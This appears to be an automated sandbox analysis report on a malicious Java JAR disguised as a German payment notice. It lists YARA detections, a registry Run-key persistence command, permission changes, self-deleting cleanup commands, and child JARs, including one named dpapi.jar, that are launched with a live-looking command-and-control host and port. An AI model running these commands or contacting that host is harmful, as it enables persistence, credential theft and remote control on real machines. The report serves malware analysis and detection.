                    Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: Process Memory Space: java.exe PID: 7728, type: MEMORYSTRMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: Process Memory Space: java.exe PID: 5540, type: MEMORYSTRMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: Process Memory Space: java.exe PID: 4860, type: MEMORYSTRMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\lib\paexec.exe, type: DROPPEDMatched rule: Detects PAExec based on strings Author: Sekoia.io
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: Process Memory Space: java.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: Process Memory Space: java.exe PID: 5540, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: Process Memory Space: java.exe PID: 4860, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: C:\Users\user\AppData\Local\Temp\lib\paexec.exe, type: DROPPEDMatched rule: tool_paexec_strings author = Sekoia.io, description = Detects PAExec based on strings, creation_date = 2022-09-23, classification = TLP:CLEAR, version = 1.0, id = c48b897c-0d88-4fa9-b64b-0e14a38a62d7
                    Source: java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Gft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBp
                    Source: classification engineClassification label: mal84.troj.expl.evad.winJAR@36/25@5/2
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641014C0 GetLastError,FormatMessageA,LocalFree,
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: C:\Users\user\1967lock.fileJump to behavior
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
                    Source: C:\Windows\System32\7za.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar"
                    Source: C:\Windows\System32\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                    Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\System32\7za.exeSection loaded: 7z.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dpapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: Binary string: D:\GitHub\PAExec\Release\PAExec.pdb source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: Avisierung vom 03.04.2025 Kundennummer 1084472.jar, type: SAMPLE
                    Source: Yara matchFile source: 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1207124995.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1204529906.0000000001150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1205204822.0000000000EFD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1367264095.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2308395794.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.1352312193.0000000001138000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2317473344.0000000014C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1205614657.0000000002C65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7za.exe PID: 7636, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: java.exe PID: 7728, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: java.exe PID: 5540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: java.exe PID: 4860, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar, type: DROPPED
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641013E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_02348A11 push cs; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_023498FB push es; retn 0001h
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_0234ED5D push ebx; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_0234ED58 push ebx; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_0234EDFB push cs; retf
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022AA20A push ecx; ret
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022AA21B push ecx; ret
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022ABB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022AB3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022AB947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022AC477 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 12_2_02A8A20A push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 12_2_02A8A21B push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 12_2_02A8B3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 12_2_02A8BB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 12_2_02A8B947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 12_2_02A8C477 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 23_2_02C3A20A push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 23_2_02C3A21B push ecx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 23_2_02C3B3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 23_2_02C3BB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 23_2_02C3B947 push 00000000h; mov dword ptr [esp], esp
